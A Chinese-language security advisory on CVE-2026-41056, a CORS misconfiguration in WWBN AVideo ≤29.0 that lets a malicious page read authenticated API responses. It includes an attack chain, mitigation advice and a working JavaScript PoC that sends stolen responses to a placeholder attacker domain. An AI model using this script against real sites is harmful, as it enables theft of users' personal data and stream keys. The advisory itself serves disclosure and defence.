CVE-2026-41056 CVSS 8.1 高危

CVE-2026-41056 AVideo CORS配置错误漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41056

漏洞类型

CORS配置错误

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在29.0及以下版本中，存在严重的CORS配置错误漏洞。受影响的`allowOrigin`函数会直接反射任意`Origin`请求头，并配合`Access-Control-Allow-Credentials: true`。由于应用使用了`SameSite=None`的会话Cookie策略，攻击者可利用此漏洞诱导用户访问恶意网站，从而发起跨域请求，窃取用户PII、直播密钥或在受害者不知情的情况下执行状态更改操作。

技术细节

该漏洞源于`objects/functions.php`文件中的`allowOrigin`函数存在逻辑缺陷。该函数在`$allowAll`参数默认为true时，会无条件将客户端请求头中的`Origin`值直接反射到响应头`Access-Control-Allow-Origin`中，并附带`Access-Control-Allow-Credentials: true`。这一配置直接影响了`plugin/API/get.json.php`和`plugin/API/set.json.php`这两个核心API端点。由于应用采用了`SameSite=None`的Cookie策略，当已登录用户访问攻击者构建的恶意网页时，浏览器会自动附带用户的会话Cookie向目标站点发起跨域请求。服务器因配置错误而允许该跨域请求并返回敏感数据，导致攻击者的JavaScript能够读取响应内容，从而窃取用户PII、直播凭证或执行状态变更操作。

攻击链分析

STEP 1

侦察

攻击者确认目标使用的是WWBN AVideo 29.0或更低版本。

STEP 2

诱导

攻击者构建包含恶意JavaScript代码的网页，并诱导已登录目标系统的用户点击访问。

STEP 3

跨域请求

用户浏览器在加载恶意页面时，执行JS代码向目标API端点（如get.json.php）发起跨域请求，并携带用户的认证Cookie。

STEP 4

数据泄露

由于服务器错误地反射了Origin头并允许凭证携带，恶意JS成功读取包含敏感信息（如PII、密钥）的API响应。

STEP 5

利用

攻击者将窃取的数据发送至自己的服务器，或利用set.json.php执行未授权的状态更改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-41056: CORS Misconfiguration in WWBN AVideo
Description: This script demonstrates how an attacker can steal data via CORS.
Usage: Host this file and trick an authenticated user into visiting it.
-->
<script>
    function exploit() {
        var targetUrl = 'https://[TARGET_DOMAIN]/plugin/API/get.json.php';
        var exfilUrl = 'https://[ATTACKER_DOMAIN]/collect';

        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function() {
            if (xhr.readyState == XMLHttpRequest.DONE) {
                // Send the stolen response to the attacker's server
                fetch(exfilUrl + '?data=' + encodeURIComponent(btoa(xhr.responseText)));
            }
        };

        // The browser automatically sets the Origin header to the attacker's domain
        // The server will reflect it and allow credentials
        xhr.open('GET', targetUrl, true);
        xhr.withCredentials = true;
        xhr.send();
    }

    exploit();
</script>

影响范围

WWBN AVideo <= 29.0

防御指南

临时缓解措施

建议立即升级到修复版本。如果无法立即升级，应手动修改源代码，移除`allowOrigin`函数中允许任意域的逻辑，仅允许受信任的域名进行跨域请求，并确保敏感API接口在处理跨域请求时进行严格的身份验证和授权检查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表